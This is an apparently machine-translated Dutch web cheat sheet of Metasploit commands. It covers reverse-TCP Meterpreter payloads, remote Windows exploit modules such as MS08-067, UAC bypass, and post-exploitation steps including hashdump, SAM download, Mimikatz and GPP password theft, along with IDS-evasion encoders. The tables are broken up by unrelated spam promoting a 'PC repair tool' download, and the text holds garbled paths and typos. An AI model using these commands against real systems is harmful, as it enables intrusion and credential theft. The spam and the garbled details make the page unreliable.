Metasploit-opdrachtenlijst (2021)-Gebruik Metasploit als een professional!
Bijgewerkt Januari 2023: Krijg geen foutmeldingen meer en vertraag je systeem met onze optimalisatietool. Haal het nu op - > deze link
- Download en installeer de reparatietool hier.
- Laat het uw computer scannen.
- De tool zal dan repareer je computer.
Wilt u Metasploit Pro Framework of Metasploit Unleashed gebruiken? Nou, je moet eerst hun commando's kennen! Hieronder delen we met u de nieuwste Metasploit-opdrachtenlijst van 2021 . Dit spiekbriefje bevat alle commando's die je ooit nodig zult hebben, van de basisprincipes tot de vooruitgang!
In deze gids zullen we het hebben over de basisprincipes van de spiekbriefje met Metasploit-commando's die kan worden gebruikt in de opdrachtregelinterface. Er zijn ook veel andere opdrachtregelconsoles beschikbaar via internet (zoals MSFConsole Command Line ), maar ze zijn erg moeilijk te gebruiken en te begrijpen.
Wat is Metasploit Framework?
Metasploit is een product dat kan worden gebruikt om in te breken in een systeem op afstand en ze kunnen ook worden gebruikt om de kwetsbaarheid van een computersysteem te testen. Net als alle andere tools voor informatiebeveiliging kan Metasploit ook voor beide doeleinden worden gebruikt (ongeautoriseerde en legitieme activiteiten). De Rapid7 heeft ook de twee eigen edities of versies toegevoegd, de Metasploit Pro en Metasploit Express. Je kunt ook enkele van onze Kali Linux Terminal-commando's voor hacken bekijken.
Belangrijke opmerkingen:
U kunt nu pc-problemen voorkomen door dit hulpmiddel te gebruiken, zoals bescherming tegen bestandsverlies en malware. Bovendien is het een geweldige manier om uw computer te optimaliseren voor maximale prestaties. Het programma herstelt veelvoorkomende fouten die kunnen optreden op Windows-systemen met gemak - geen noodzaak voor uren van troubleshooting wanneer u de perfecte oplossing binnen handbereik hebt:
- Stap 1: Downloaden PC Reparatie & Optimalisatie Tool (Windows 11, 10, 8, 7, XP, Vista - Microsoft Gold Certified).
- Stap 2: Klik op "Start Scan" om problemen in het Windows register op te sporen die PC problemen zouden kunnen veroorzaken.
- Stap 3: Klik op "Repair All" om alle problemen op te lossen.
Metasploit benadrukt het risico en de oplossing van bepaalde bugs die mogelijk beschikbaar zijn op je pc. Later werd de fuzzing-tool ook opgenomen in de Metasploit 3.0 die werd gebruikt om de kwetsbaarheden van software te ontdekken, zelfs met de exploits voor de bekende bugs. Na enige tijd werd in de maand november 2006 ook de lorcon wireless (802.11) toolset aan de Metasploit 3.0 toegevoegd. Na al deze updates bracht de Rapid7 de Metasploit 4.0 uit in de maand augustus 2011.
Dat kan. download Metasploit Pro Framework van de onderstaande pagina:
Download Metasploit Pro Framework gratis
Een korte geschiedenis van Metasploit Framework
H. D. Moore was de maker van deze draagbare netwerktool genaamd Metasploit die Perl gebruikte in 2003. In 2007 werd het Metasploit Framework volledig herschreven in de Ruby. Op 21 oktober 2009 heeft de Metasploit aangekondigd dat het is gekocht of overgenomen door de Rapid7. Rapid7 is een beveiligingsbedrijf dat vele soorten uniforme oplossingen voor het beheer van kwetsbaarheden biedt.
Lijst met nieuwste Metasploit-opdrachten 2021 (nieuw)
- Meterpreter Payloads:
- Windows reverse meterpreter payload
Commando | Beschrijving van CMD |
payload windows/meterpreter/reverse_tcp | Windows reverse tcp payload |
Windows VNC-payload voor Meterpreter
Commando | Beschrijving van CMD |
set payload windows/vncinject/reverse_tcpset ViewOnly false | Meterpreter Windows VNC Payload
|
Linux Reverse Meterpreter-payload
Commando | Beschrijving van CMD |
set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload |
Meterpreter Cheat Sheet-opdrachten (2021 nieuwste)
Commando | Beschrijving van CMD |
uploadbestand c:\\\\windows | Meterpreter uploadt bestand naar het Windows-doel machine |
download c:\\\\windows\\\\reparatie\\\\sam/tmp | Meterpreter downloadbestand van Windows-doel |
download c:\\\\windows\\\\repair\\\\sam/tmp | Meterpreter downloadt de bestanden van de Windows-doelmachine |
execute-f c:\\\\windows\\temp\\exploit.exe | Meterpreter run .exe op doel ? handig voor het uitvoeren van geüploade exploits |
execute-f cmd-c | Creëert een nieuw kanaal met behulp van de cmd-shell |
ps | Meterpreter toont u de huidige processen die draaiende |
shell | Meterpreter krijgt de shell-toegang op de doelcomputer of server |
getsystem | Meterpreter probeert privileges te escaleren om toegang te krijgen tot het doel |
hashdump | Meterpreter probeert de hashes op het doel te dumpen |
portfwd add-l 3389 –p 3389 –r target | Meterpreter maakt een poort voorwaarts naar de doelmachine |
poort fwd delete –l 3389 –p 3389 –r target | Meterpreter verwijdert de port forward-functie |
Lezen: Top 9 Microsoft CMD Command Prompt Hacking Commands 2021.
Gemeenschappelijke Metasploit-modules en Remote Windows Metasploit-modules
Commando | Beschrijving van CMD |
gebruik exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
gebruik exploit/windows/dcerpc/ms06_040_netapi | MS08_040 Windows NT, 2k, XP, 2003 Exploit op afstand |
use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index |
MS09_050 Windows Vista SP1/SP2 en Server 2008 (x86) Exploit op afstand |
Lokale Windows Metasploit-modules
Commando | Beschrijving van CMD |
gebruik exploit/windows/local/bypassuac | UAC omzeilen op Windows 7 + Stel doel + arch in, x86/64 |
Auxilary Metasploit Modules
Commando | Beschrijving van CMD |
gebruik auxiliary/scanner/http/dir_scanner | Metasploit HTTP-directoryscanner |
gebruik auxiliary/scanner/http/jboss_vulnscan | Metasploit JBOSS kwetsbaarheidsscanner |
gebruik auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL-referentiescanner |
gebruik auxiliary/scanner/mysql/mysql_version | Metasploit MSSQL-versiescanner |
gebruik auxiliary/scanner/oracle/oracle_login | Metasploit Oracle Login Module |
Lees ook: De perfecte gids voor DDoS als een professionele hacker.
Metasploit Powershell Modules
Commando | Beschrijving van CMD |
gebruik exploit/multi/script/web_delivery | Metasploit powershell payload delivery module |
post/windows/manage/powershell/exec_powershell | Metasploit upload en voer powershell-script uit tijdens een sessie |
use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS implementeren |
gebruik exploit/windows/mssql/mssql_payload | Metasploit MSSQL-payload |
Post-exploit Windows Metasploit-modules
Command | Beschrijving van CMD |
run post/windows/gather/win_privs | Metasploit toont de rechten van de huidige gebruiker |
gebruik post/windows/gather/credentials/gpp | Metasploit pak GPP-opgeslagen wachtwoorden |
oad mimikatz-> wdigest | Metasplit laad Mimikatz |
voer post/windows/gather/local_admin_search_enum | Ik wijs andere machines aan waartoe de opgegeven domeingebruiker beheerderstoegang heeft |
Bron: TheHackToday
De basis Metasploit-opdrachten die u in 2021 moet kennen
De Metasploit-commando voor het updaten van Framework:
apt update; apt install metasploit-framework |
De volgende opdracht die hierboven wordt vermeld, geeft de laatste versie van de Metasploit-framework dat is bijgewerkt. De update zegt het volgende dat we de wekelijkse update van de kopie van ons Metasploit Framework moeten bijwerken. Maar er is een klein nadeel van deze opdracht en het is dat het uitvoeren van deze opdracht de kopie van uw software die op uw pc is geïnstalleerd, kan beschadigen of breken.
Aanbevolen lezen : Top 8 Beste Linux-distributies voor hacking en penetratietesten!
Metasploit-opdrachten msfhelp/console:
Wanneer u de Metasploit voor de eerste keer start, verschijnt het volgende venster opent op uw scherm. Als je niets weet over of geen informatie hebt met betrekking tot de Metasploit, typ dan gewoon: help om alle commando's en informatie gerelateerd aan de Metasploit te zien.
Ik ga je tijd niet verspillen bij het uitleggen van alle commando's op de Metasploit, maar ik zal enkele van de basiscommando's en meest gebruikte commando's bespreken die je meestal gaat gebruiken.
- Basiscommando's: deze commando's worden gebruikt om te zoeken, , Terug, Help, Info en Exit.
- Exploit-opdrachten: deze opdrachten worden gebruikt om variabelen in te stellen en de exploit-opties en ontwijkingsopties, payloads en encoders te tonen.
- Exploit-uitvoeringsopdrachten : Deze commando's worden gebruikt om exploits uit te voeren en uit te voeren tegen een specifiek doel.
Meer nuttige Metasploit-opdrachten:
- Zoekopdracht:
Deze opdracht wordt gebruikt om te zoeken naar verschillende soorten of soorten kwetsbaarheden en exploits van de msfconsole.
- Info Command:
Dit commando wordt gebruikt om de documentatie in de gaten te houden en de eigenaar van de exploit te bekijken.
Lezen: 8 beste manieren om uw Linux-server te beveiligen (Linux Hardening Guide 2021).
- Toon opties commando :
Met behulp van dit eenvoudige commando kunnen we show-commando's gebruiken om alle waarden weer te geven die nodig zijn voor de payload die verder kunnen worden gebruikt om de pc of machine van het slachtoffer aan te vallen die we willen aanvallen.
- LHOST :
Met behulp van dit commando kun je gemakkelijk uitvoeren of om het WAN-netwerk aan te vallen, hoeft u alleen de LHOST in te stellen op het statische IP-adres IP en alle andere voorwaartse poorten.
- LPORT :
Als u het op het LAN-netwerk probeert, hoeft u de poort niet door te sturen, maar u kunt elke poort gebruiken die u wilt gebruiken. Maar als je het WAN-netwerk aanvalt, moet je die poort die je wilt aanvallen respectievelijk overdragen.
- Ladingen weergeven :
Met behulp van dit commando gebruiken we het show payloads commando. Deze opdracht retourneert een hele lijst met compatibele payloads voor de volgende exploit. In de volgende afbeelding heeft de Metasploit veel compatibele payloads geladen:
- Targets weergeven:
Deze opdracht zal een hele lijst retourneren van besturingssystemen die erg kwetsbaar zijn voor de geselecteerde of gekozen exploit. Na het uitvoeren van deze opdracht krijgen we de volgende uitvoer van de volgende exploit:
adobe_flash_shader_drawing_fill exploit.
- Show Advanced:
Door dit show advanced commando te gebruiken kunnen we alle geavanceerde opties voor de vereiste exploits bekijken.
Downloaden: Nessus Professional Vulnerability Scanner Software.
- Show Encoders:
Deze opdracht wordt gebruikt om alle compatibele encoders. Deze encoders worden gebruikt om de simpele IDS/IPS-handtekeningen te omzeilen die gezocht worden voor de bepaalde bytes van de beschikbare payload.
- Show nops:
Dit commando zal een hele lijst van de NOP-generatoren teruggeven. NOP is de afkorting voor No Operation en wordt gebruikt om het patroon te wijzigen om eenvoudige IDS/IPS van gewone NOP-sleden te omzeilen. Deze NOP-generatoren beginnen met een hele configuratie van CPU-architectuur in de naam.
Downloaden: Acunetix Web Vulnerability Scanner gratis.
U kunt de officiële Offensive Security site voor de volledige AZ Metasploit-opdrachten.
Kent u nog meer Metasploit-opdrachten die we aan deze lijst kunnen toevoegen?
In dit artikel hebben we de Lijst met Metasploit-commando's in 2021 besproken. We hebben het ook gehad over veel verschillende commando's die je kunt gebruiken om verschillende taken uit te voeren en alle verschillende functionaliteiten. Het is een volkomen veilige methode om de kwetsbare controle te gebruiken en uit te voeren en om al die gerelateerde problemen op te lossen.
Ik hoop dat deze gids echt nuttig voor je zal zijn. Deel het met uw vrienden en familie om hen te helpen hun problemen op te lossen. Als je een vraag hebt, laat deze dan achter in het commentaargedeelte. We zijn er altijd om u te helpen als u hulp nodig heeft.